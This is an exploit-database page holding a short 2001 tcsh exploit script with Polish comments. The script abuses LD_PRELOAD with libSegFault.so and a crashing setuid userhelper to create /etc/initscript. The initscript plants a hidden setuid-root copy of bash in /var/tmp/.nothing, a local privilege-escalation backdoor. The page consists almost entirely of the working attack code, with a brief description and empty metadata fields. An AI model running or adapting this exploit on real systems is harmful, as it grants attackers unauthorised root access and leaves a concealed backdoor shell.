header-logo
Suggest Exploit
vendor:
Unknown
by:
milw0rm.com
N/A
CVSS
N/A
LD_PRELOAD exploit
Unknown
CWE
Product Name: Unknown
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested: Red Hat 6.0
2001

LD_PRELOAD Exploit in initscript

This exploit takes advantage of a vulnerability in the LD_PRELOAD environment variable to execute arbitrary code. It specifically targets the initscript file on Red Hat 6.0 and potentially other systems. It creates a file called /etc/initscript and modifies its contents to copy /bin/bash to /var/tmp/.nothing, set the setuid bit on /var/tmp/.nothing, and then remove /etc/initscript.

Mitigation:

Unknown
Source

Exploit-DB raw data:

#!/bin/tcsh
# przyklad wykorzystania dziury w LD_PRELOAD
# shadow (tested on redhat 6.0, should work on others)

if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
echo czekaj... to moze chwile potrwac...
while (! -e /etc/initscript )
  ( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end

echo utworzylem plik initscript

cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_

echo i nawet go podmienilem

# milw0rm.com [2001-03-04]

Navigation

Suggest Exploit

Services By CQR